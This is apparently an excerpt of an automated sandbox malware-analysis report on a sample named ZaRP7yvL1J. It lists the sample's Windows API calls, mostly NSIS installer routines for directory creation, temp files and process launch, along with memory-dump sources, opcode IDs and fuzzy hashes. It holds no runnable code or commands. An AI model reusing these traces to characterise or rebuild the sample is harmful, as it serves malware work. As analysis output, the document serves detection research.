                                                                                                            • API String ID: 464197530-0
                                                                                                            • Opcode ID: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                                                                                            • Instruction ID: 3410daaf41eb2a8de7896e1fb7aa518538b3e031ab7f3cb45a1fbd23233d04dd
                                                                                                            • Opcode Fuzzy Hash: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                                                                                            • Instruction Fuzzy Hash: CE116A32500108FBDF12AB90CE09FEE7B7DAF44350F100076B905B61E0E7B59E21AB58
                                                                                                            APIs
                                                                                                            • CreateDirectoryW.KERNEL32(?,?,00000000), ref: 00405962
                                                                                                            • GetLastError.KERNEL32 ref: 00405976
                                                                                                            • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040598B
                                                                                                            • GetLastError.KERNEL32 ref: 00405995
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2928589443.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2928554628.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928607933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928626637.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928652130.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                            • String ID:
                                                                                                            • API String ID: 3449924974-0
                                                                                                            • Opcode ID: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                                                                                            • Instruction ID: ca5323325ecea66cc3de0aafa4d6cbc44a00468c8660a14113972894dcb98988
                                                                                                            • Opcode Fuzzy Hash: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                                                                                            • Instruction Fuzzy Hash: 970108B1C10219DADF009FA5C944BEFBFB4EB14314F00403AE544B6290DB789608CFA9
                                                                                                            APIs
                                                                                                              • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                              • Part of subcall function 00405D68: CharNextW.USER32(?,?,00425F30,?,00405DDC,00425F30,00425F30,00437800,?,74DF2EE0,00405B1A,?,00437800,74DF2EE0,00000000), ref: 00405D76
                                                                                                              • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
                                                                                                              • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93
                                                                                                            • lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30,00437800,?,74DF2EE0,00405B1A,?,00437800,74DF2EE0,00000000), ref: 00405E1E
                                                                                                            • GetFileAttributesW.KERNEL32(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30,00437800,?,74DF2EE0,00405B1A,?,00437800,74DF2EE0), ref: 00405E2E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2928589443.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2928554628.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928607933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928626637.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928652130.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                            • String ID: 0_B
                                                                                                            • API String ID: 3248276644-2128305573
                                                                                                            • Opcode ID: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
                                                                                                            • Instruction ID: e2ef3bf648e1011fa726b67e088789f036b8871ba300d86fb9c867912b04298b
                                                                                                            • Opcode Fuzzy Hash: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
                                                                                                            • Instruction Fuzzy Hash: B4F0F439109E5116D62233365D09BEF0548CF82354B5A853BFC91B22D2DB3C8A539DFE
                                                                                                            APIs
                                                                                                            • IsWindowVisible.USER32(?), ref: 004053F3
                                                                                                            • CallWindowProcW.USER32(?,?,?,?), ref: 00405444
                                                                                                              • Part of subcall function 004043AB: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043BD
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2928589443.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2928554628.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928607933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928626637.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928652130.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$CallMessageProcSendVisible
                                                                                                            • String ID:
                                                                                                            • API String ID: 3748168415-3916222277
                                                                                                            • Opcode ID: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
                                                                                                            • Instruction ID: 343f6187318c33bb175646012d6cb398530476c6c15fe8dd96994d534b9a6b17
                                                                                                            • Opcode Fuzzy Hash: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
                                                                                                            • Instruction Fuzzy Hash: CC0171B1200609ABDF305F11DD84B9B3666EBD4356F508037FA00761E1C77A8DD29A6E
                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 00405F2B
                                                                                                            • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00435000,004034A3,00437000,00437800,00437800,00437800,00437800,00437800,74DF3420,004036EF), ref: 00405F46
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2928589443.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2928554628.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928607933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928626637.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928652130.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CountFileNameTempTick
                                                                                                            • String ID: nsa
                                                                                                            • API String ID: 1716503409-2209301699
                                                                                                            • Opcode ID: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                                                                            • Instruction ID: 076564571966e4dc9ef4834731be4d502634ae0aeddccfca5b4533d1bab5a213
                                                                                                            • Opcode Fuzzy Hash: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                                                                            • Instruction Fuzzy Hash: 14F09076601204FFEB009F59ED05E9BB7A8EB95750F10803AEE00F7250E6B49A548B68
                                                                                                            APIs
                                                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 004059FA
                                                                                                            • CloseHandle.KERNEL32(?), ref: 00405A07
                                                                                                            Strings
                                                                                                            • Error launching installer, xrefs: 004059E4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2928589443.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2928554628.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928607933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928626637.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928652130.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseCreateHandleProcess
                                                                                                            • String ID: Error launching installer
                                                                                                            • API String ID: 3712363035-66219284
                                                                                                            • Opcode ID: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                                                                            • Instruction ID: 166b032e71181ba573d10d742cd21a74b10ba840f41c43b266edefbe5b435367
                                                                                                            • Opcode Fuzzy Hash: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                                                                            • Instruction Fuzzy Hash: E5E04FB0A102097FEB009B64ED49F7B76ACFB04208F404531BD00F2150D774A8208A7C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2928589443.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2928554628.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928607933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928626637.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928652130.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                                                                            • Instruction ID: 2bd06e12bed6e0bcd81d630d0cd78bd49004ac77cb8b5ebb757de7108a839e92
                                                                                                            • Opcode Fuzzy Hash: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                                                                            • Instruction Fuzzy Hash: 1DA14471E04228CBDF28CFA8C8446ADBBB1FF44305F14806ED856BB281D7786A86DF45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2928589443.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2928554628.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928607933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928626637.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928652130.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                                                                            • Instruction ID: f1da02a2f8b93330a3d469e31e6e9edf047fa596270f1f1d86c95cc791e20b04
                                                                                                            • Opcode Fuzzy Hash: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                                                                            • Instruction Fuzzy Hash: AA910271E04228CBEF28CF98C8447ADBBB1FB45305F14816AD856BB291C778A986DF45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2928589443.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2928554628.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928607933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928626637.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928652130.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                                                                            • Instruction ID: fb1d02f26201205f5bfcbd3029eb7cfad7cca69a3f8c46de7b35964bdd0c3f7d
                                                                                                            • Opcode Fuzzy Hash: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                                                                            • Instruction Fuzzy Hash: 18814571E04228DFDF24CFA8C844BADBBB1FB45305F24816AD856BB291C7389986DF45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2928589443.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2928554628.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928607933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928626637.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928652130.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                                                                            • Instruction ID: 55fc176551b00f8465723d30588461dcf2fc1d3195b414c524ee7a2fcbdbe87b
                                                                                                            • Opcode Fuzzy Hash: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                                                                            • Instruction Fuzzy Hash: 39815971E04228DBEF24CFA8C844BADBBB1FB45305F14816AD856BB2C1C7786986DF45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2928589443.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2928554628.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928607933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928626637.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928652130.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                                                                            • Instruction ID: 7645ab34ef40ba223d211dbe726f8302725d3f31b3e808d93cc70016d3e0d248
                                                                                                            • Opcode Fuzzy Hash: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                                                                            • Instruction Fuzzy Hash: 10711471E04228DBDF24CF98C8447ADBBB1FF49305F15806AD856BB281C7389A86DF45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2928589443.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2928554628.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928607933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928626637.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928652130.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                                                                                            • Instruction ID: a4e19b7408f2815589132e7e2b866ae2b9c8caa40868d81b8a4623295251dea3
                                                                                                            • Opcode Fuzzy Hash: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                                                                                            • Instruction Fuzzy Hash: 0D712571E04218DBEF28CF98C844BADBBB1FF45305F15806AD856BB281C7389986DF45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2928589443.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2928554628.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928607933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928626637.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928652130.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                                                                                            • Instruction ID: 979076adb26e5f1e3e7a9458f232081f51f9a0722543042d1d726f4d31452a21
                                                                                                            • Opcode Fuzzy Hash: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                                                                                            • Instruction Fuzzy Hash: 50714871E04228DBEF28CF98C8447ADBBB1FF45305F15806AD856BB281C7386A46DF45
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2928370071.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_d0000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Xbq$Xbq$Xbq$Xbq
                                                                                                            • API String ID: 0-2732225958
                                                                                                            • Opcode ID: f7249ec8f52246e02c850963d6eb27be0e5ee95823f3f58c34068b7f07f1e5e3
                                                                                                            • Instruction ID: 955d620fe784e23b832230279e86946ca3ae641ca7a9be1ab67fa2414016adec
                                                                                                            • Opcode Fuzzy Hash: f7249ec8f52246e02c850963d6eb27be0e5ee95823f3f58c34068b7f07f1e5e3
                                                                                                            • Instruction Fuzzy Hash: EC315230E013199BDFA48BA985443EEB6E6AB94310F1445BBD419A7395EF30CD80CFA2
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2928370071.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_d0000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: \;^q$\;^q$\;^q$\;^q
                                                                                                            • API String ID: 0-3001612457
                                                                                                            • Opcode ID: 7692cf75bba3f7e2e31f03dabb8574c4aa19ef728738e9929e8f42fb3240bb61
                                                                                                            • Instruction ID: 124d2704856cc8c2caa6eff0b50817533a028963eee8335afdeaf5e5e7fa8562
                                                                                                            • Opcode Fuzzy Hash: 7692cf75bba3f7e2e31f03dabb8574c4aa19ef728738e9929e8f42fb3240bb61
                                                                                                            • Instruction Fuzzy Hash: EA01D831740A05DFCBA48E2CC864929B3EBAF88B727254467D846CF3B0DA31DC4187A0
                                                                                                            APIs
                                                                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                                                                            • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E6B
                                                                                                            • CharNextA.USER32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7C
                                                                                                            • lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2928589443.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000004.00000002.2928554628.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928607933.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928626637.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000004.00000002.2928652130.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                                                                            • String ID:
                                                                                                            • API String ID: 190613189-0
                                                                                                            • Opcode ID: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                                            • Instruction ID: 3eb9f18af2c16f81f4dc7877ab3147293eaebe45f2d41041cd024b5e05e36bdf
                                                                                                            • Opcode Fuzzy Hash: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                                            • Instruction Fuzzy Hash: 4AF0C831100514AFC7029B94DD4099FBBA8DF06354B25407AE844FB211D634DF01AB98